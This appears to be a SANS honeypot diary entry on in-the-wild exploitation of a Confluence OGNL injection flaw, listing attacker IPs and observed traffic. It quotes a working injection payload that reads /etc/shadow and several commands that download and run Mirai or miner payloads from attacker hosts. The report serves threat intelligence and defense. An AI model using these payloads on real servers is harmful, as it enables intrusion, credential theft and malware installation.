Exploit activity against Atlassian Confluence servers has exploded since we first discussed it yesterday. The combination of a simple-to-exploit vulnerability and a potential set of high-value targets makes this an ideal vulnerability for many attackers.

It is questionable how many high-value targets are vulnerable. Most organizations have migrated to the Atlassian cloud offerings and do not host tools like Confluence on premises. 

One of the first IPs we saw exploit the vulnerability was 38.150.12.131. This IP address started with a simple "cat /etc/shadow" style exploit, likely testing exploitability.

name=aaxxxa&list=ccc&list=ddd&list=ddd&list=ddd&list=ddd&listKey=11&size=1&multiple=1&label=111\\u0027%2b#request.get(\\u0027.KEY_velocity.struts2.context\\
\u0027).internalGet(\\u0027ognl\\u0027).findValue(#parameters.poc[0],{})%2b\\u0027&poc=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-\
Cmd-Response',(new freemarker.template.utility.Execute()).exec({'cat /etc/shadow'}))

The IP address isn't specifically remarkable. We did not see earlier exploit attempts from that IP. Forumspammers had it listed for a while for occasional spamming of forums, which may indicate that this host has been compromised or abused in the past.

One of the most prolific IPs exploiting the vulnerability is 20.205.116.139. The IP is part of Azure's cloud, and according to Shodan, uses the hostname "PENTEST2". It does not appear to be used by any known researchers. Not sure why someone pentests honeypots :( 

Some of the exploit attempts we have seen:

Various patterns like:

wget http://124.156.132.142:6999/x86_64 -P /tmp/
 ({"curl -s -L http://45.77.45.106:58989/setup.sh | bash"})
({"wget http://103.233.11.14:6663/SafeDate -P /tmp/ && chmod 777 /tmp/SafeDate && cd /tmp && ./SafeDatee"}))

These are sometimes base64 encoded. The payload downloaded tends to be a well known malicious payload like Mirai variants, or is some cases crypto coin miners.

Simple "exploitability checks" like:

({"id"}))
({'cat /etc/shadow'}))
 ({'whoami'}))

sometimes with various encodings (e.g. URL encoded)

We also see heavy use of Oast for vulnerability checks. (OAST = Out of Band Application Security Testing). The domains being used include:

oast.live
oast.fun
oast.site

The idea is to have vulnerable systems connect to the unique URL or resolve unique hostnames.

Overall, regarding the vulnerability lifecycle, this vulnerability is now in the hands of the "Mirai and Cryptominer" crowd. Expect news articles next week that Iran is exploiting this against government systems.

If you find an unpatched system: Do no only assume compromise. In addition to the simple backdoors and miners, you may also have more sophisticated exploits establishing persistent access to the system.

---
Johannes B. Ullrich, Ph.D. , Dean of Research, SANS.edu
Twitter|